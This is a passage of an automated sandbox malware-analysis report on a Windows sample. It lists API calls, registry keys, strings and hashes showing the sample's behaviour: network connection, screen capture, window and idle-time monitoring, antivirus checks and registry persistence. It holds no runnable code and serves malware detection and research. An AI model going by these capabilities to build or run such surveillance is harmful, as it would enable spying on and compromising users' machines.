                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                  • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                  • API String ID: 354323817-737951744

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 02D09E7B
                                                                                                  • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 02D09EFC
                                                                                                  • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 02D09F24
                                                                                                  • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 02D09F7F
                                                                                                  • _malloc.LIBCMT ref: 02D09FC0
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
                                                                                                  • _free.LIBCMT ref: 02D0A000
                                                                                                  • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 02D0A028
                                                                                                  • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 02D0A0B7
                                                                                                  • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 02D0A112
                                                                                                  • _free.LIBCMT ref: 02D0A134
                                                                                                  • _memcpy_s.LIBCMT ref: 02D0A183
                                                                                                  • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 02D0A1D0
                                                                                                  • GdipCreateBitmapFromScan0.GDIPLUS(?,?,02D25A78,00022009,?,00000000,?,00000000), ref: 02D0A22C
                                                                                                  • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 02D0A24C
                                                                                                  • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 02D0A267
                                                                                                  • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 02D0A274
                                                                                                  • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 02D0A27B
                                                                                                  • _free.LIBCMT ref: 02D0A296
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                  • String ID: &
                                                                                                  • API String ID: 640422297-3042966939

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D02DBB
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D02DC7
                                                                                                  • timeGetTime.WINMM ref: 02D02DCD
                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 02D02DFA
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02D02E26
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02D02E32
                                                                                                  • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02D02E51
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02D02E5D
                                                                                                  • gethostbyname.WS2_32(00000000), ref: 02D02E6B
                                                                                                  • htons.WS2_32(?), ref: 02D02E8D
                                                                                                  • connect.WS2_32(?,?,00000010), ref: 02D02EAB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                  • String ID: 0u
                                                                                                  • API String ID: 640718063-3203441087

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ResetEvent.KERNEL32(?), ref: 00972D9B
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00972DA7
                                                                                                  • timeGetTime.WINMM ref: 00972DAD
                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00972DDA
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00972E06
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00972E12
                                                                                                  • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 00972E31
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00972E3D
                                                                                                  • gethostbyname.WS2_32(00000000), ref: 00972E4B
                                                                                                  • htons.WS2_32(?), ref: 00972E6D
                                                                                                  • connect.WS2_32(?,?,00000010), ref: 00972E8B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                  • String ID: 0u
                                                                                                  • API String ID: 640718063-3203441087

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 02D0AD53
                                                                                                  • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 02D0AD73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: OpenQueryValue
                                                                                                  • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                  • API String ID: 4153817207-1338088003

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0618B
                                                                                                  • lstrcatW.KERNEL32(02D31F10,02D2510C,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D061CD
                                                                                                  • lstrcatW.KERNEL32(02D31F10,02D2535C,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D061D9
                                                                                                  • CoCreateInstance.OLE32(02D22480,00000000,00000017,02D2578C,?,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D06220
                                                                                                  • _memset.LIBCMT ref: 02D062CE
                                                                                                  • wsprintfW.USER32 ref: 02D06336
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 02D0635F
                                                                                                  • _memset.LIBCMT ref: 02D06376
                                                                                                    • Part of subcall function 02D06050: _memset.LIBCMT ref: 02D0607C
                                                                                                    • Part of subcall function 02D06050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 02D06088
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                  • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                  • API String ID: 1221949200-1583895642

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,2024.12.28), ref: 02D05F66
                                                                                                  • GetLastError.KERNEL32 ref: 02D05F6E
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 02D05F85
                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,2024.12.28), ref: 02D05F90
                                                                                                  • GetLastError.KERNEL32 ref: 02D05F92
                                                                                                  • _memset.LIBCMT ref: 02D05FB9
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D05FC6
                                                                                                  • lstrcmpW.KERNEL32(?,02D25328), ref: 02D05FED
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 02D05FF8
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 02D06005
                                                                                                  • GetConsoleWindow.KERNEL32 ref: 02D0600F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                  • String ID: 2024.12.28$key$open
                                                                                                  • API String ID: 2922109467-4166660675

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D062CE
                                                                                                  • wsprintfW.USER32 ref: 02D06336
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 02D0635F
                                                                                                  • _memset.LIBCMT ref: 02D06376
                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 02D063B2
                                                                                                  • lstrcatW.KERNEL32(02D31F10,?), ref: 02D063CE
                                                                                                  • lstrcatW.KERNEL32(02D31F10,02D2535C), ref: 02D063DA
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 02D063E3
                                                                                                  • lstrlenW.KERNEL32(02D31F10,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D06427
                                                                                                  • lstrcatW.KERNEL32(02D31F10,02D253D4,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D0643B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                  • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                  • API String ID: 1671694837-1583895642

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000002,?,7A8163DF,?,00000000,?), ref: 02D0C09E
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 02D0C0AA
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 02D0C0BF
                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 02D0C0D5
                                                                                                  • EnterCriticalSection.KERNEL32(02D2FB64), ref: 02D0C113
                                                                                                  • LeaveCriticalSection.KERNEL32(02D2FB64), ref: 02D0C124
                                                                                                    • Part of subcall function 02D09DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 02D09E04
                                                                                                    • Part of subcall function 02D09DE0: GdipDisposeImage.GDIPLUS(?), ref: 02D09E18
                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 02D0C14C
                                                                                                    • Part of subcall function 02D0A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 02D0A48D
                                                                                                    • Part of subcall function 02D0A460: _free.LIBCMT ref: 02D0A503
                                                                                                  • GetHGlobalFromStream.OLE32(?,?), ref: 02D0C16D
                                                                                                  • GlobalLock.KERNEL32(?), ref: 02D0C177
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 02D0C18F
                                                                                                    • Part of subcall function 02D09BA0: DeleteObject.GDI32(?), ref: 02D09BD2
                                                                                                    • Part of subcall function 02D09BA0: EnterCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09BE3
                                                                                                    • Part of subcall function 02D09BA0: EnterCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09BF8
                                                                                                    • Part of subcall function 02D09BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,02D09B7B), ref: 02D09C04
                                                                                                    • Part of subcall function 02D09BA0: LeaveCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09C15
                                                                                                    • Part of subcall function 02D09BA0: LeaveCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09C1C
                                                                                                  • GlobalSize.KERNEL32(00000000), ref: 02D0C1A5
                                                                                                  • GlobalUnlock.KERNEL32(?), ref: 02D0C221
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 02D0C249
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1483550337-0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D064C2
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 02D064E2
                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02D06524
                                                                                                  • _memset.LIBCMT ref: 02D06560
                                                                                                  • _memset.LIBCMT ref: 02D0658E
                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,753C73E0), ref: 02D065BA
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,753C73E0), ref: 02D065C3
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,753C73E0), ref: 02D065D5
                                                                                                  • RegCloseKey.ADVAPI32(?,00000000,00000AD4,753C73E0), ref: 02D06625
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D06635
                                                                                                  Strings
                                                                                                  • Software\Tencent\Plugin\VAS, xrefs: 02D064D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                  • String ID: Software\Tencent\Plugin\VAS
                                                                                                  • API String ID: 2921034913-3343197220
                                                                                                  APIs
                                                                                                  • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 02D0A48D
                                                                                                  • _malloc.LIBCMT ref: 02D0A4D1
                                                                                                  • _free.LIBCMT ref: 02D0A503
                                                                                                  • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 02D0A522
                                                                                                  • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 02D0A594
                                                                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 02D0A59F
                                                                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 02D0A5C5
                                                                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 02D0A5DD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                  • String ID: &
                                                                                                  • API String ID: 2794124522-3042966939
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 00975382
                                                                                                  • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 00975392
                                                                                                  • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0098C6E0,000012A0), ref: 009753B0
                                                                                                  • RegCloseKey.KERNEL32(?), ref: 009753BB
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0097540F
                                                                                                  • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0097541B
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00975434
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                  • String ID: IpDates_info$SOFTWARE
                                                                                                  • API String ID: 864241144-2243437601
                                                                                                  • Opcode ID: 07730cdfd9f608883fca0becfa8c3b8de239232b7bdeed08d0f0ae094386f43c
                                                                                                  • Instruction ID: 558965c34c611017b11bb6df2baeaf53bdefb5b0344f506d675828bc110840f8
                                                                                                  • Opcode Fuzzy Hash: 07730cdfd9f608883fca0becfa8c3b8de239232b7bdeed08d0f0ae094386f43c
                                                                                                  • Instruction Fuzzy Hash: A74117B364C641DBD3509F348C49B7A7BA9AB51344FAE8458F58DDA2A2D3F0D805C3A2
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 00975382
                                                                                                  • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 00975392
                                                                                                  • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0098C6E0,000012A0), ref: 009753B0
                                                                                                  • RegCloseKey.KERNEL32(?), ref: 009753BB
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0097540F
                                                                                                  • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0097541B
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00975434
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                  • String ID: IpDates_info$SOFTWARE
                                                                                                  • API String ID: 864241144-2243437601
                                                                                                  • Opcode ID: ec441cdbb7529eff906fdabb3b09756d72656f41fc86158d5ff143c826c358b1
                                                                                                  • Instruction ID: f9f9a6ed43abf667fd8ac65fc1cc564d9c0c5a30511becfa4465088a0508c3c5
                                                                                                  • Opcode Fuzzy Hash: ec441cdbb7529eff906fdabb3b09756d72656f41fc86158d5ff143c826c358b1
                                                                                                  • Instruction Fuzzy Hash: 9B31D27224C781DFD760CF708C08F7A7BA9AB55344FAE8488F18D9A2A2C3E0D806C751
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,02D212F8,7A8163DF,00000001,00000000,00000000), ref: 02D0CAB1
                                                                                                  • RegQueryInfoKeyW.ADVAPI32(02D212F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02D0CAE0
                                                                                                  • _memset.LIBCMT ref: 02D0CB44
                                                                                                  • _memset.LIBCMT ref: 02D0CB53
                                                                                                  • RegEnumValueW.KERNEL32(02D212F8,?,00000000,?,00000000,?,00000000,?), ref: 02D0CB72
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                    • Part of subcall function 02D0F707: std::exception::exception.LIBCMT ref: 02D0F756
                                                                                                    • Part of subcall function 02D0F707: std::exception::exception.LIBCMT ref: 02D0F770
                                                                                                    • Part of subcall function 02D0F707: __CxxThrowException@8.LIBCMT ref: 02D0F781
                                                                                                  • RegCloseKey.KERNEL32(02D212F8,?,?,?,?,?,?,?,?,?,?,?,00000000,02D212F8,000000FF), ref: 02D0CC83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                  • String ID: Console\0
                                                                                                  • API String ID: 1348767993-1253790388
                                                                                                  • Opcode ID: c3bd157b71f405809e530cea3b60c2bdd14b29f520f0ce55347069b83b29febb
                                                                                                  • Instruction ID: b4d218f9f834d85cfdd78e9ba57ba55db461571005e481ea587aabb91765c433
                                                                                                  • Opcode Fuzzy Hash: c3bd157b71f405809e530cea3b60c2bdd14b29f520f0ce55347069b83b29febb
                                                                                                  • Instruction Fuzzy Hash: 8F611EB1D00219AFDB14DFA8D881EAEB7B9FF48310F14466AF915A7391D734AD01CBA4
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • _memset.LIBCMT ref: 02D0BB21
                                                                                                  • GetLastInputInfo.USER32(?), ref: 02D0BB37
                                                                                                  • GetTickCount.KERNEL32 ref: 02D0BB3D
                                                                                                  • wsprintfW.USER32 ref: 02D0BB66
                                                                                                  • GetForegroundWindow.USER32 ref: 02D0BB6F
                                                                                                  • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 02D0BB83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                  • String ID: %d min
                                                                                                  • API String ID: 3754759880-1947832151
                                                                                                  • Opcode ID: d14e636c141408883cdcdcbdf59b0706c37dbd4b82d2864036c2dd725489ff85
                                                                                                  • Instruction ID: 4b997a6a44e421be642bc06aa3c263434f3ed4bd300651f844007f20728a317e
                                                                                                  • Opcode Fuzzy Hash: d14e636c141408883cdcdcbdf59b0706c37dbd4b82d2864036c2dd725489ff85
                                                                                                  • Instruction Fuzzy Hash: ED418EB5900214AFCB10DFA4D888B9FBBB9EF44714F148555F9099B3A1DB749E04CBE1
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D06DD9
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,02D25164,00000000,00020019,s<u), ref: 02D06DFC
                                                                                                  • RegQueryValueExW.KERNEL32(s<u,GROUP,00000000,00000001,?,00000208), ref: 02D06E4A
                                                                                                  • lstrcmpW.KERNEL32(?,02D25148), ref: 02D06E60
                                                                                                  • lstrcpyW.KERNEL32(02D056EA,?), ref: 02D06E72
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                  • String ID: GROUP$s<u
                                                                                                  • API String ID: 2102619503-3119169592
                                                                                                  • Opcode ID: 48feffedeebe7a6bbf7e1daaaca7c665837f6369432e5d6fdfaa1cb3d7e664bb
                                                                                                  • Instruction ID: e23ed2981163d645c0117a9b318f1200a96c6b2e27c58fc9ff8e60e300345e84
                                                                                                  • Opcode Fuzzy Hash: 48feffedeebe7a6bbf7e1daaaca7c665837f6369432e5d6fdfaa1cb3d7e664bb
                                                                                                  • Instruction Fuzzy Hash: A5319471940319ABDB30DF90ED89B9AB7B8EB08714F104299E519A6290DB74DE54CFA0
                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32(7A8163DF,00000000,00000000,753C73E0,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06938
